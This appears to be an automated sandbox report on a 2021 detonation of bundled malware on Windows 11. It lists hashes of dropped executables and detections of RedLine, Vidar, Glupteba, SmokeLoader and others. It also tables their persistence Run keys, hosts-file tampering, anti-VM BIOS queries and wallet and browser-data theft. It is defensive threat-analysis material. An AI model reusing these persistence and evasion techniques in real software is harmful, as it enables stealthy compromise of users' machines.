| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
memory/3872-353-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe
| MD5 | 145bf5658332302310a7fe40ed77783d |
| SHA1 | 5370ac46379b8db9d9fca84f21d411687109486f |
| SHA256 | bddcd5eba3036a21b11e6d6d3cbe84daf562db27814adf7e32b5cc103d3c25d3 |
| SHA512 | d3d9a8231f256efee7ce7ba6841d78c598dc912e7e5d503a9a094e6303d0f9f165a60c5370f353076b1f592d7d9ee6765d0ba4863a1c4935bb47e2ffa4ffb776 |
C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe
| MD5 | 145bf5658332302310a7fe40ed77783d |
| SHA1 | 5370ac46379b8db9d9fca84f21d411687109486f |
| SHA256 | bddcd5eba3036a21b11e6d6d3cbe84daf562db27814adf7e32b5cc103d3c25d3 |
| SHA512 | d3d9a8231f256efee7ce7ba6841d78c598dc912e7e5d503a9a094e6303d0f9f165a60c5370f353076b1f592d7d9ee6765d0ba4863a1c4935bb47e2ffa4ffb776 |
C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/1144-367-0x0000000002B10000-0x0000000002B11000-memory.dmp
C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/5024-364-0x0000000000000000-mapping.dmp
memory/3596-363-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe
| MD5 | 3b4348d187f24c82370836531f3fa94e |
| SHA1 | a2ca4e9f4a8d9c8634e42765e90e252803e20b15 |
| SHA256 | cd189a8c952420bf33b68cce03b41900e8c784b1010213b097ecdb2d7e8079f7 |
| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe
| MD5 | 6753c0fadc839415e31b170b5df98fc7 |
| SHA1 | 7adbd92546bc0516013c0f6832ea272cf0606c60 |
| SHA256 | 01550ee84ac5a220197177182fd2f3f9c9e845b416d06a384384e3cd62ecb569 |
| SHA512 | 92c0264046f1293b02ccccbb3cb5b80510d2d3a1d1caff23815adb4c715d0aced08e57682c6dcb76fdca70eb46bc819db2a763f050f74de27fbb3946dca504ab |
memory/3884-378-0x0000000000000000-mapping.dmp
memory/3928-381-0x0000000000000000-mapping.dmp
memory/4116-384-0x0000000000000000-mapping.dmp
memory/2796-385-0x0000000000000000-mapping.dmp
memory/2988-388-0x00000000048B0000-0x00000000048DF000-memory.dmp
memory/1580-391-0x0000000004BC0000-0x0000000005166000-memory.dmp
memory/856-392-0x0000000000000000-mapping.dmp
memory/3872-397-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3396-399-0x00000000007E0000-0x00000000007E3000-memory.dmp
memory/3020-405-0x0000000000000000-mapping.dmp
memory/3396-394-0x0000000000000000-mapping.dmp
memory/5284-413-0x0000000000000000-mapping.dmp
memory/5368-421-0x0000000000000000-mapping.dmp
memory/5432-426-0x0000000000000000-mapping.dmp
memory/2796-439-0x0000000005440000-0x0000000005A58000-memory.dmp
memory/5368-434-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3884-428-0x0000000005590000-0x0000000005591000-memory.dmp
memory/5460-430-0x0000000000000000-mapping.dmp
memory/5572-443-0x0000000000000000-mapping.dmp
memory/5596-442-0x0000000000000000-mapping.dmp
memory/5548-440-0x0000000000000000-mapping.dmp
memory/5640-446-0x0000000000000000-mapping.dmp
memory/5572-464-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5548-459-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5760-470-0x0000000000000000-mapping.dmp
memory/5772-463-0x0000000000000000-mapping.dmp
memory/5912-484-0x0000000000000000-mapping.dmp
memory/5972-483-0x0000000000000000-mapping.dmp
memory/5408-475-0x0000000000000000-mapping.dmp
memory/880-478-0x0000000005990000-0x0000000005991000-memory.dmp
memory/5572-472-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/1504-486-0x0000000005320000-0x0000000005321000-memory.dmp
memory/6116-497-0x0000000000000000-mapping.dmp
memory/5912-500-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1936-494-0x0000000003F80000-0x0000000003FAF000-memory.dmp
memory/5760-506-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/3032-505-0x0000000000000000-mapping.dmp
memory/400-507-0x0000000000000000-mapping.dmp
memory/3032-524-0x0000000002100000-0x0000000002101000-memory.dmp
memory/3484-525-0x0000000000000000-mapping.dmp
memory/3124-517-0x0000000000000000-mapping.dmp
memory/3728-534-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/5796-535-0x0000000000000000-mapping.dmp
memory/3728-549-0x0000000005910000-0x0000000005911000-memory.dmp
memory/6116-553-0x000000001BAD0000-0x000000001BAD2000-memory.dmp
memory/5212-544-0x0000023DB5350000-0x0000023DB5352000-memory.dmp
memory/5572-558-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5572-555-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/5408-537-0x0000000005530000-0x0000000005B48000-memory.dmp
memory/3596-530-0x0000000004080000-0x00000000040B0000-memory.dmp
memory/3728-515-0x0000000000000000-mapping.dmp
memory/5404-514-0x0000000000000000-mapping.dmp
memory/5640-518-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5212-512-0x0000000000000000-mapping.dmp
memory/5772-509-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5572-562-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/5572-565-0x0000000005A90000-0x0000000005A91000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
371s
Max time network
1780s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
Raccoon
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SET3995.tmp | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| File created | C:\Windows\System32\drivers\SET3995.tmp | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\build.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\build.\\build.exe" | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MaskVPN\\Hetysholoxa.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\4750957.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\kNQQghA2b3_W8RSpEJCcChiB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
